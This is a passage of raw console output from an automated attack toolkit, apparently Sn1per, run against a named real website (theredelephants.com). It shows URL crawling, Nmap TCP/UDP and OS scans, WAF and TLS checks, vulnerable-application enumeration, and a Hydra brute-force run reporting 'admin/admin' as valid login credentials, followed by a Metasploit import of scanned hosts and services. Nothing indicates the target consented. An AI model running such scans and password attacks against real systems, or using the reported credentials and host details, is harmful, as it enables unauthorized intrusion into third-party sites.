2584. |_[ + ] [ 87 / 100 ]-[00:24:51] [ - ]
2585. |_[ + ] Target:: [ http://theredelephants.com/my-account/ ]
2586. |_[ + ] Exploit::
2587. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2588. |_[ + ] More details:: / - / , ISP:
2589. |_[ + ] Found:: UNIDENTIFIED
2590.  
2591. _[ - ]::--------------------------------------------------------------------------------------------------------------
2592. |_[ + ] [ 88 / 100 ]-[00:24:53] [ - ]
2593. |_[ + ] Target:: [ http://theredelephants.com/tag/progressives/ ]
2594. |_[ + ] Exploit::
2595. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2596. |_[ + ] More details:: / - / , ISP:
2597. |_[ + ] Found:: UNIDENTIFIED
2598.  
2599. _[ - ]::--------------------------------------------------------------------------------------------------------------
2600. |_[ + ] [ 89 / 100 ]-[00:24:55] [ - ]
2601. |_[ + ] Target:: [ http://theredelephants.com/tag/oathkeepers/ ]
2602. |_[ + ] Exploit::
2603. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2604. |_[ + ] More details:: / - / , ISP:
2605. |_[ + ] Found:: UNIDENTIFIED
2606.  
2607. _[ - ]::--------------------------------------------------------------------------------------------------------------
2608. |_[ + ] [ 90 / 100 ]-[00:24:57] [ - ]
2609. |_[ + ] Target:: [ http://theredelephants.com/tag/bannon/ ]
2610. |_[ + ] Exploit::
2611. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2612. |_[ + ] More details:: / - / , ISP:
2613. |_[ + ] Found:: UNIDENTIFIED
2614.  
2615. _[ - ]::--------------------------------------------------------------------------------------------------------------
2616. |_[ + ] [ 91 / 100 ]-[00:24:58] [ - ]
2617. |_[ + ] Target:: [ http://theredelephants.com/tag/4chan/ ]
2618. |_[ + ] Exploit::
2619. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2620. |_[ + ] More details:: / - / , ISP:
2621. |_[ + ] Found:: UNIDENTIFIED
2622.  
2623. _[ - ]::--------------------------------------------------------------------------------------------------------------
2624. |_[ + ] [ 92 / 100 ]-[00:25:00] [ - ]
2625. |_[ + ] Target:: [ http://theredelephants.com/tag/titanpointe/ ]
2626. |_[ + ] Exploit::
2627. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2628. |_[ + ] More details:: / - / , ISP:
2629. |_[ + ] Found:: UNIDENTIFIED
2630.  
2631. _[ - ]::--------------------------------------------------------------------------------------------------------------
2632. |_[ + ] [ 93 / 100 ]-[00:25:02] [ - ]
2633. |_[ + ] Target:: [ http://theredelephants.com/tag/att/ ]
2634. |_[ + ] Exploit::
2635. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2636. |_[ + ] More details:: / - / , ISP:
2637. |_[ + ] Found:: UNIDENTIFIED
2638.  
2639. _[ - ]::--------------------------------------------------------------------------------------------------------------
2640. |_[ + ] [ 94 / 100 ]-[00:25:04] [ - ]
2641. |_[ + ] Target:: [ http://theredelephants.com/tag/republican/ ]
2642. |_[ + ] Exploit::
2643. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2644. |_[ + ] More details:: / - / , ISP:
2645. |_[ + ] Found:: UNIDENTIFIED
2646.  
2647. _[ - ]::--------------------------------------------------------------------------------------------------------------
2648. |_[ + ] [ 95 / 100 ]-[00:25:06] [ - ]
2649. |_[ + ] Target:: [ http://theredelephants.com/tag/moar/ ]
2650. |_[ + ] Exploit::
2651. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2652. |_[ + ] More details:: / - / , ISP:
2653. |_[ + ] Found:: UNIDENTIFIED
2654.  
2655. _[ - ]::--------------------------------------------------------------------------------------------------------------
2656. |_[ + ] [ 96 / 100 ]-[00:25:08] [ - ]
2657. |_[ + ] Target:: [ http://theredelephants.com/tag/oabamcare/ ]
2658. |_[ + ] Exploit::
2659. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2660. |_[ + ] More details:: / - / , ISP:
2661. |_[ + ] Found:: UNIDENTIFIED
2662.  
2663. _[ - ]::--------------------------------------------------------------------------------------------------------------
2664. |_[ + ] [ 97 / 100 ]-[00:25:10] [ - ]
2665. |_[ + ] Target:: [ http://theredelephants.com/tag/blm/ ]
2666. |_[ + ] Exploit::
2667. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2668. |_[ + ] More details:: / - / , ISP:
2669. |_[ + ] Found:: UNIDENTIFIED
2670.  
2671. _[ - ]::--------------------------------------------------------------------------------------------------------------
2672. |_[ + ] [ 98 / 100 ]-[00:25:12] [ - ]
2673. |_[ + ] Target:: [ http://theredelephants.com/contact-2/ ]
2674. |_[ + ] Exploit::
2675. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2676. |_[ + ] More details:: / - / , ISP:
2677. |_[ + ] Found:: UNIDENTIFIED
2678.  
2679. _[ - ]::--------------------------------------------------------------------------------------------------------------
2680. |_[ + ] [ 99 / 100 ]-[00:25:14] [ - ]
2681. |_[ + ] Target:: [ http://theredelephants.com/tag/reddit/ ]
2682. |_[ + ] Exploit::
2683. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2684. |_[ + ] More details:: / - / , ISP:
2685. |_[ + ] Found:: UNIDENTIFIED
2686.  
2687. [ INFO ] [ Shutting down ]
2688. [ INFO ] [ End of process INURLBR at [08-11-2018 00:25:14]
2689. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
2690. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/plugins/slurp/output/inurlbr-theredelephants.com.txt ]
2691. |_________________________________________________________________________________________
2692.  
2693. \_________________________________________________________________________________________/
2694. #######################################################################################################################################
2695. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:25 EST
2696. Nmap scan report for theredelephants.com (104.196.67.80)
2697. Host is up (0.21s latency).
2698.  
2699. PORT STATE SERVICE VERSION
2700. 123/udp open|filtered ntp
2701. Too many fingerprints match this host to give specific OS details
2702. Network Distance: 18 hops
2703.  
2704. TRACEROUTE (using proto 1/icmp)
2705. HOP RTT ADDRESS
2706. 1 118.92 ms 10.245.200.1
2707. 2 121.08 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
2708. 3 119.72 ms 195.42.145.65
2709. 4 135.04 ms 108.170.244.240
2710. 5 127.40 ms 72.14.238.53
2711. 6 199.91 ms 216.239.54.84
2712. 7 210.90 ms 209.85.255.252
2713. 8 210.93 ms 216.239.41.232
2714. 9 ... 17
2715. 18 213.57 ms 104.196.67.80
2716. #######################################################################################################################################
2717. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:27 EST
2718. Nmap scan report for theredelephants.com (104.196.67.80)
2719. Host is up (0.17s latency).
2720.  
2721. PORT STATE SERVICE VERSION
2722. 161/tcp filtered snmp
2723. 161/udp open|filtered snmp
2724. Too many fingerprints match this host to give specific OS details
2725. Network Distance: 18 hops
2726.  
2727. TRACEROUTE (using proto 1/icmp)
2728. HOP RTT ADDRESS
2729. 1 119.34 ms 10.245.200.1
2730. 2 119.37 ms 185.94.189.129
2731. 3 120.14 ms 195.42.145.65
2732. 4 127.80 ms 108.170.244.240
2733. 5 127.84 ms 209.85.251.179
2734. 6 200.27 ms 216.239.54.150
2735. 7 211.79 ms 209.85.255.244
2736. 8 211.07 ms 72.14.239.185
2737. 9 ... 17
2738. 18 212.06 ms 104.196.67.80
2739. #######################################################################################################################################
2740.  
2741. ^ ^
2742. _ __ _ ____ _ __ _ _ ____
2743. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
2744. | V V // o // _/ | V V // 0 // 0 // _/
2745. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
2746. <
2747. ...'
2748.  
2749. WAFW00F - Web Application Firewall Detection Tool
2750.  
2751. By Sandro Gauci && Wendel G. Henrique
2752.  
2753. Checking https://theredelephants.com
2754. #######################################################################################################################################
2755. https://theredelephants.com [200 OK] Country[UNITED STATES][US], Email[contact@theredelephants.com], HTTPServer[nginx], IP[104.196.67.80], JQuery[1.12.4], MetaGenerator[Powered by WPBakery Page Builder - drag and drop page builder for WordPress.], Open-Graph-Protocol[article], PoweredBy[WPBakery], Script[application/ld+json,text/javascript], Title[Home - The Red Elephants], UncommonHeaders[link,wpe-backend,x-cacheable,x-pass-why,x-cache-group,x-type], WordPress, nginx
2756. #######################################################################################################################################
2757.  
2758.  
2759.  
2760. AVAILABLE PLUGINS
2761. -----------------
2762.  
2763. PluginChromeSha1Deprecation
2764. PluginSessionResumption
2765. PluginSessionRenegotiation
2766. PluginCompression
2767. PluginHSTS
2768. PluginOpenSSLCipherSuites
2769. PluginHeartbleed
2770. PluginCertInfo
2771.  
2772.  
2773.  
2774. CHECKING HOST(S) AVAILABILITY
2775. -----------------------------
2776.  
2777. theredelephants.com:443 => 104.196.67.80:443
2778.  
2779.  
2780.  
2781. SCAN RESULTS FOR THEREDELEPHANTS.COM:443 - 104.196.67.80:443
2782. ------------------------------------------------------------
2783.  
2784. * Deflate Compression:
2785. OK - Compression disabled
2786.  
2787. * Session Renegotiation:
2788. Client-initiated Renegotiations: OK - Rejected
2789. Secure Renegotiation: OK - Supported
2790.  
2791. * Certificate - Content:
2792. SHA1 Fingerprint: 0707f8a55c34596e0f7f1eabf202d40d9f0505cd
2793. Common Name: *.wpengine.com
2794. Issuer: RapidSSL RSA CA 2018
2795. Serial Number: 050E0BC8753CB966CCD109DFB99C23B2
2796. Not Before: Feb 1 00:00:00 2018 GMT
2797. Not After: Jul 20 12:00:00 2019 GMT
2798. Signature Algorithm: sha256WithRSAEncryption
2799. Public Key Algorithm: rsaEncryption
2800. Key Size: 2048 bit
2801. Exponent: 65537 (0x10001)
2802. X509v3 Subject Alternative Name: {'DNS': ['*.wpengine.com', 'wpengine.com']}
2803.  
2804. * Certificate - Trust:
2805. Hostname Validation: FAILED - Certificate does NOT match theredelephants.com
2806. Google CA Store (09/2015): OK - Certificate is trusted
2807. Java 6 CA Store (Update 65): OK - Certificate is trusted
2808. Microsoft CA Store (09/2015): OK - Certificate is trusted
2809. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
2810. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
2811. Certificate Chain Received: ['*.wpengine.com', 'RapidSSL RSA CA 2018', 'DigiCert Global Root CA']
2812.  
2813. * Certificate - OCSP Stapling:
2814. NOT SUPPORTED - Server did not send back an OCSP response.
2815.  
2816. * Session Resumption:
2817. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
2818. With TLS Session Tickets: OK - Supported
2819.  
2820. * SSLV2 Cipher Suites:
2821. Server rejected all cipher suites.
2822.  
2823. * SSLV3 Cipher Suites:
2824. Server rejected all cipher suites.
2825.  
2826.  
2827.  
2828. SCAN COMPLETED IN 4.65 S
2829. ------------------------
2830. Version: 1.11.12-static
2831. OpenSSL 1.0.2-chacha (1.0.2g-dev)
2832.  
2833. Connected to 104.196.67.80
2834.  
2835. Testing SSL server theredelephants.com on port 443 using SNI name theredelephants.com
2836.  
2837. TLS Fallback SCSV:
2838. Server supports TLS Fallback SCSV
2839.  
2840. TLS renegotiation:
2841. Session renegotiation not supported
2842.  
2843. TLS Compression:
2844. Compression disabled
2845.  
2846. Heartbleed:
2847. TLS 1.2 not vulnerable to heartbleed
2848. TLS 1.1 not vulnerable to heartbleed
2849. TLS 1.0 not vulnerable to heartbleed
2850.  
2851. Supported Server Cipher(s):
2852. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
2853. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
2854. Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
2855. Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
2856. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
2857. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
2858. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
2859. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
2860. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
2861. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
2862. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
2863. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
2864. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
2865. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
2866. Accepted TLSv1.2 256 bits AES256-SHA256
2867. Accepted TLSv1.2 256 bits AES256-SHA
2868. Accepted TLSv1.2 128 bits AES128-SHA256
2869. Accepted TLSv1.2 128 bits AES128-SHA
2870. Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
2871. Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
2872. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
2873. Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
2874. Accepted TLSv1.1 256 bits AES256-SHA
2875. Accepted TLSv1.1 128 bits AES128-SHA
2876.  
2877. SSL Certificate:
2878. Signature Algorithm: sha256WithRSAEncryption
2879. RSA Key Strength: 2048
2880.  
2881. Subject: *.wpengine.com
2882. Altnames: DNS:*.wpengine.com, DNS:wpengine.com
2883. Issuer: RapidSSL RSA CA 2018
2884.  
2885. Not valid before: Feb 1 00:00:00 2018 GMT
2886. Not valid after: Jul 20 12:00:00 2019 GMT
2887.  
2888. #######################################################################################################################################
2889.  
2890. I, [2018-11-08T00:32:26.695775 #7041] INFO -- : Initiating port scan
2891. I, [2018-11-08T00:33:29.958426 #7041] INFO -- : Using nmap scan output file logs/nmap_output_2018-11-08_00-32-26.xml
2892. I, [2018-11-08T00:33:29.959370 #7041] INFO -- : Discovered open port: 104.196.67.80:80
2893. I, [2018-11-08T00:33:30.895001 #7041] INFO -- : Discovered open port: 104.196.67.80:443
2894. I, [2018-11-08T00:33:32.610571 #7041] INFO -- : <<<Enumerating vulnerable applications>>>
2895.  
2896.  
2897. --------------------------------------------------------
2898. <<<Yasuo discovered following vulnerable applications>>>
2899. --------------------------------------------------------
2900. +----------+--------------------+-------------------+----------+----------+
2901. | App Name | URL to Application | Potential Exploit | Username | Password |
2902. +----------+--------------------+-------------------+----------+----------+
2903. +----------+--------------------+-------------------+----------+----------+
2904. #######################################################################################################################################
2905. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:36 EST
2906. NSE: Loaded 148 scripts for scanning.
2907. NSE: Script Pre-scanning.
2908. Initiating NSE at 00:36
2909. Completed NSE at 00:36, 0.00s elapsed
2910. Initiating NSE at 00:36
2911. Completed NSE at 00:36, 0.00s elapsed
2912. Initiating Parallel DNS resolution of 1 host. at 00:36
2913. Completed Parallel DNS resolution of 1 host. at 00:36, 16.50s elapsed
2914. Initiating SYN Stealth Scan at 00:36
2915. Scanning theredelephants.com (104.196.67.80) [474 ports]
2916. Discovered open port 443/tcp on 104.196.67.80
2917. Discovered open port 80/tcp on 104.196.67.80
2918. Discovered open port 2222/tcp on 104.196.67.80
2919. Completed SYN Stealth Scan at 00:36, 6.90s elapsed (474 total ports)
2920. Initiating Service scan at 00:36
2921. Scanning 3 services on theredelephants.com (104.196.67.80)
2922. Completed Service scan at 00:37, 34.01s elapsed (3 services on 1 host)
2923. Initiating OS detection (try #1) against theredelephants.com (104.196.67.80)
2924. Retrying OS detection (try #2) against theredelephants.com (104.196.67.80)
2925. Initiating Traceroute at 00:37
2926. Completed Traceroute at 00:37, 0.13s elapsed
2927. Initiating Parallel DNS resolution of 2 hosts. at 00:37
2928. Completed Parallel DNS resolution of 2 hosts. at 00:37, 16.50s elapsed
2929. NSE: Script scanning 104.196.67.80.
2930. Initiating NSE at 00:37
2931. Completed NSE at 00:37, 9.16s elapsed
2932. Initiating NSE at 00:37
2933. Completed NSE at 00:37, 0.00s elapsed
2934. Nmap scan report for theredelephants.com (104.196.67.80)
2935. Host is up (0.13s latency).
2936. Not shown: 468 filtered ports
2937. PORT STATE SERVICE VERSION
2938. 25/tcp closed smtp
2939. 80/tcp open http-proxy Squid http proxy
2940. |_http-open-proxy: Proxy might be redirecting requests
2941. |_http-title: 500 Server error
2942. 139/tcp closed netbios-ssn
2943. 443/tcp open ssl/http nginx
2944. |_http-server-header: nginx
2945. |_http-title: 502 Bad Gateway
2946. | ssl-cert: Subject: commonName=*.wpengine.com
2947. | Subject Alternative Name: DNS:*.wpengine.com, DNS:wpengine.com
2948. | Issuer: commonName=RapidSSL RSA CA 2018/organizationName=DigiCert Inc/countryName=US
2949. | Public Key type: rsa
2950. | Public Key bits: 2048
2951. | Signature Algorithm: sha256WithRSAEncryption
2952. | Not valid before: 2018-02-01T00:00:00
2953. | Not valid after: 2019-07-20T12:00:00
2954. | MD5: 78f7 9fa1 664d 3813 0245 5d39 813d d072
2955. |_SHA-1: 0707 f8a5 5c34 596e 0f7f 1eab f202 d40d 9f05 05cd
2956. |_ssl-date: TLS randomness does not represent time
2957. | tls-alpn:
2958. | h2
2959. |_ http/1.1
2960. | tls-nextprotoneg:
2961. | h2
2962. |_ http/1.1
2963. 445/tcp closed microsoft-ds
2964. 2222/tcp open ssh ProFTPD mod_sftp 0.9.9 (protocol 2.0)
2965. Device type: general purpose|storage-misc|broadband router|WAP|phone
2966. Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (94%), HP embedded (91%), Asus embedded (88%), Google Android 4.X (87%)
2967. OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/h:hp:p2000_g3 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel cpe:/h:asus:rt-ac66u cpe:/o:google:android:4.0
2968. Aggressive OS guesses: Linux 3.16 - 4.6 (94%), Linux 3.10 - 4.11 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 4.2 (92%), Linux 4.4 (92%), Linux 3.18 (91%), HP P2000 G3 NAS device (91%), Linux 3.2 - 4.9 (91%), Linux 3.16 (90%)
2969. No exact OS matches for host (test conditions non-ideal).
2970. Uptime guess: 86.627 days (since Mon Aug 13 10:34:48 2018)
2971. Network Distance: 2 hops
2972. TCP Sequence Prediction: Difficulty=261 (Good luck!)
2973. IP ID Sequence Generation: All zeros
2974.  
2975. TRACEROUTE (using port 139/tcp)
2976. HOP RTT ADDRESS
2977. 1 126.04 ms 10.245.200.1
2978. 2 125.82 ms 104.196.67.80
2979.  
2980. NSE: Script Post-scanning.
2981. Initiating NSE at 00:37
2982. Completed NSE at 00:37, 0.00s elapsed
2983. Initiating NSE at 00:37
2984. Completed NSE at 00:37, 0.00s elapsed
2985. Read data files from: /usr/bin/../share/nmap
2986. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
2987. Nmap done: 1 IP address (1 host up) scanned in 89.19 seconds
2988. Raw packets sent: 1010 (47.860KB) | Rcvd: 630 (111.367KB)
2989. #######################################################################################################################################
2990. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:37 EST
2991. NSE: Loaded 148 scripts for scanning.
2992. NSE: Script Pre-scanning.
2993. Initiating NSE at 00:37
2994. Completed NSE at 00:37, 0.00s elapsed
2995. Initiating NSE at 00:37
2996. Completed NSE at 00:37, 0.00s elapsed
2997. Initiating Parallel DNS resolution of 1 host. at 00:37
2998. Completed Parallel DNS resolution of 1 host. at 00:38, 16.50s elapsed
2999. Initiating UDP Scan at 00:38
3000. Scanning theredelephants.com (104.196.67.80) [14 ports]
3001. Completed UDP Scan at 00:38, 2.10s elapsed (14 total ports)
3002. Initiating Service scan at 00:38
3003. Scanning 12 services on theredelephants.com (104.196.67.80)
3004. Service scan Timing: About 8.33% done; ETC: 00:57 (0:17:47 remaining)
3005. Completed Service scan at 00:39, 102.58s elapsed (12 services on 1 host)
3006. Initiating OS detection (try #1) against theredelephants.com (104.196.67.80)
3007. Retrying OS detection (try #2) against theredelephants.com (104.196.67.80)
3008. Initiating Traceroute at 00:39
3009. Completed Traceroute at 00:40, 7.19s elapsed
3010. Initiating Parallel DNS resolution of 1 host. at 00:40
3011. Completed Parallel DNS resolution of 1 host. at 00:40, 16.50s elapsed
3012. NSE: Script scanning 104.196.67.80.
3013. Initiating NSE at 00:40
3014. Completed NSE at 00:40, 20.38s elapsed
3015. Initiating NSE at 00:40
3016. Completed NSE at 00:40, 1.03s elapsed
3017. Nmap scan report for theredelephants.com (104.196.67.80)
3018. Host is up (0.16s latency).
3019.  
3020. PORT STATE SERVICE VERSION
3021. 53/udp open|filtered domain
3022. 67/udp open|filtered dhcps
3023. 68/udp open|filtered dhcpc
3024. 69/udp open|filtered tftp
3025. 88/udp open|filtered kerberos-sec
3026. 123/udp open|filtered ntp
3027. 137/udp filtered netbios-ns
3028. 138/udp filtered netbios-dgm
3029. 139/udp open|filtered netbios-ssn
3030. 161/udp open|filtered snmp
3031. 162/udp open|filtered snmptrap
3032. 389/udp open|filtered ldap
3033. 520/udp open|filtered route
3034. 2049/udp open|filtered nfs
3035. Too many fingerprints match this host to give specific OS details
3036.  
3037. TRACEROUTE (using port 138/udp)
3038. HOP RTT ADDRESS
3039. 1 121.69 ms 10.245.200.1
3040. 2 ... 3
3041. 4 117.26 ms 10.245.200.1
3042. 5 122.86 ms 10.245.200.1
3043. 6 122.86 ms 10.245.200.1
3044. 7 122.86 ms 10.245.200.1
3045. 8 122.86 ms 10.245.200.1
3046. 9 122.86 ms 10.245.200.1
3047. 10 122.88 ms 10.245.200.1
3048. 11 ... 18
3049. 19 122.05 ms 10.245.200.1
3050. 20 117.44 ms 10.245.200.1
3051. 21 ... 27
3052. 28 117.99 ms 10.245.200.1
3053. 29 ...
3054. 30 118.15 ms 10.245.200.1
3055.  
3056. NSE: Script Post-scanning.
3057. Initiating NSE at 00:40
3058. Completed NSE at 00:40, 0.00s elapsed
3059. Initiating NSE at 00:40
3060. Completed NSE at 00:40, 0.00s elapsed
3061. Read data files from: /usr/bin/../share/nmap
3062. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
3063. Nmap done: 1 IP address (1 host up) scanned in 171.98 seconds
3064. Raw packets sent: 135 (8.008KB) | Rcvd: 665 (105.041KB)
3065. #######################################################################################################################################
3066. __________ __ ____ ___
3067. \______ \_______ __ ___/ |_ ____ \ \/ /
3068. | | _/\_ __ \ | \ __\/ __ \ \ /
3069. | | \ | | \/ | /| | \ ___/ / \
3070. |______ / |__| |____/ |__| \___ >___/\ \
3071. \/ \/ \_/
3072.  
3073. + -- --=[BruteX v1.7 by 1N3
3074. + -- --=[http://crowdshield.com
3075.  
3076.  
3077. ################################### Running Port Scan #################################################################################
3078. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:40 EST
3079. Nmap scan report for theredelephants.com (104.196.67.80)
3080. Host is up (0.14s latency).
3081. Not shown: 21 filtered ports, 3 closed ports
3082. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
3083. PORT STATE SERVICE
3084. 80/tcp open http
3085. 443/tcp open https
3086.  
3087. Nmap done: 1 IP address (1 host up) scanned in 19.24 seconds
3088.  
3089. ################################### Running Brute Force ###############################################################################
3090.  
3091. + -- --=[Port 21 closed... skipping.
3092. + -- --=[Port 22 closed... skipping.
3093. + -- --=[Port 23 closed... skipping.
3094. + -- --=[Port 25 closed... skipping.
3095. + -- --=[Port 80 opened... running tests...
3096. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
3097.  
3098. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-08 00:41:02
3099. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
3100. [DATA] attacking http-get://theredelephants.com:80//
3101. [80][http-get] host: theredelephants.com login: admin password: admin
3102. [STATUS] attack finished for theredelephants.com (valid pair found)
3103. 1 of 1 target successfully completed, 1 valid password found
3104. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-08 00:41:24
3105. + -- --=[Port 110 closed... skipping.
3106. + -- --=[Port 139 closed... skipping.
3107. + -- --=[Port 162 closed... skipping.
3108. + -- --=[Port 389 closed... skipping.
3109. + -- --=[Port 443 opened... running tests...
3110. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
3111.  
3112. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-08 00:41:24
3113. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
3114. [DATA] attacking http-gets://theredelephants.com:443//
3115. [443][http-get] host: theredelephants.com login: admin password: admin
3116. [STATUS] attack finished for theredelephants.com (valid pair found)
3117. 1 of 1 target successfully completed, 1 valid password found
3118. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-08 00:41:44
3119. + -- --=[Port 445 closed... skipping.
3120. + -- --=[Port 512 closed... skipping.
3121. + -- --=[Port 513 closed... skipping.
3122. + -- --=[Port 514 closed... skipping.
3123. + -- --=[Port 993 closed... skipping.
3124. + -- --=[Port 1433 closed... skipping.
3125. + -- --=[Port 1521 closed... skipping.
3126. + -- --=[Port 3306 closed... skipping.
3127. + -- --=[Port 3389 closed... skipping.
3128. + -- --=[Port 5432 closed... skipping.
3129. + -- --=[Port 5900 closed... skipping.
3130. + -- --=[Port 5901 closed... skipping.
3131. + -- --=[Port 8000 closed... skipping.
3132. + -- --=[Port 8080 closed... skipping.
3133. + -- --=[Port 8100 closed... skipping.
3134. + -- --=[Port 6667 closed... skipping.
3135.  
3136.  
3137. * default
3138. * default
3139. [*] Importing 'Nmap XML' data
3140. [*] Import: Parsing with 'Nokogiri v1.8.5'
3141. [*] Importing host 104.196.67.80
3142. [*] Successfully imported /usr/share/sniper/loot/theredelephants.com/nmap/nmap-theredelephants.com.xml
3143. [*] Importing 'Nmap XML' data
3144. [*] Import: Parsing with 'Nokogiri v1.8.5'
3145. [*] Importing host 104.196.67.80
3146. [*] Successfully imported /usr/share/sniper/loot/theredelephants.com/nmap/nmap-udp-theredelephants.com.xml
3147. [*] Importing 'Nmap XML' data
3148. [*] Import: Parsing with 'Nokogiri v1.8.5'
3149. [*] Importing host 104.196.67.80
3150. [*] Successfully imported /usr/share/sniper/loot/theredelephants.com/nmap/nmap-theredelephants.com-udp.xml
3151.  
3152. Hosts
3153. =====
3154.  
3155. address mac name os_name os_flavor os_sp purpose info comments
3156. ------- --- ---- ------- --------- ----- ------- ---- --------
3157. 91.121.2.184 Linux 2.6.X server
3158. 104.196.67.80 Linux 3.X server
3159. 195.55.47.89 Windows 3.X device
3160.  
3161. Services
3162. ========
3163.  
3164. host port proto name state info
3165. ---- ---- ----- ---- ----- ----
3166. 91.121.2.184 22 tcp ssh open OpenSSH 5.3 protocol 2.0
3167. 91.121.2.184 25 tcp smtp closed
3168. 91.121.2.184 53 udp domain unknown
3169. 91.121.2.184 67 udp dhcps unknown
3170. 91.121.2.184 68 udp dhcpc unknown
3171. 91.121.2.184 69 udp tftp unknown
3172. 91.121.2.184 80 tcp http open Apache httpd PHP 5.6.14
3173. 91.121.2.184 88 udp kerberos-sec unknown
3174. 91.121.2.184 123 udp ntp unknown
3175. 91.121.2.184 137 udp netbios-ns filtered
3176. 91.121.2.184 138 udp netbios-dgm filtered
3177. 91.121.2.184 139 tcp netbios-ssn closed
3178. 91.121.2.184 139 udp netbios-ssn unknown
3179. 91.121.2.184 161 udp snmp unknown
3180. 91.121.2.184 162 udp snmptrap unknown
3181. 91.121.2.184 389 tcp ldap open OpenLDAP 2.2.X - 2.3.X
3182. 91.121.2.184 389 udp ldap unknown
3183. 91.121.2.184 443 tcp ssl/ssl open Apache httpd SSL-only mode
3184. 91.121.2.184 445 tcp microsoft-ds closed
3185. 91.121.2.184 465 tcp ssl/smtps open
3186. 91.121.2.184 520 udp route unknown
3187. 91.121.2.184 993 tcp ssl/imaps open
3188. 91.121.2.184 2049 udp nfs unknown
3189. 91.121.2.184 7071 tcp ssl/iwg1 open
3190. 91.121.2.184 8080 tcp ssh open OpenSSH 5.3 protocol 2.0
3191. 104.196.67.80 25 tcp smtp closed
3192. 104.196.67.80 53 udp domain unknown
3193. 104.196.67.80 67 udp dhcps unknown
3194. 104.196.67.80 68 udp dhcpc unknown
3195. 104.196.67.80 69 udp tftp unknown
3196. 104.196.67.80 80 tcp http-proxy open Squid http proxy
3197. 104.196.67.80 88 udp kerberos-sec unknown
3198. 104.196.67.80 123 udp ntp unknown
3199. 104.196.67.80 137 udp netbios-ns filtered
3200. 104.196.67.80 138 udp netbios-dgm filtered
3201. 104.196.67.80 139 tcp netbios-ssn closed
3202. 104.196.67.80 139 udp netbios-ssn unknown
3203. 104.196.67.80 161 udp snmp unknown
3204. 104.196.67.80 162 udp snmptrap unknown
3205. 104.196.67.80 389 udp ldap unknown
3206. 104.196.67.80 443 tcp ssl/http open nginx
3207. 104.196.67.80 445 tcp microsoft-ds closed
3208. 104.196.67.80 520 udp route unknown
3209. 104.196.67.80 2049 udp nfs unknown
3210. 104.196.67.80 2222 tcp ssh open ProFTPD mod_sftp 0.9.9 protocol 2.0
3211. 195.55.47.89 25 tcp smtp closed
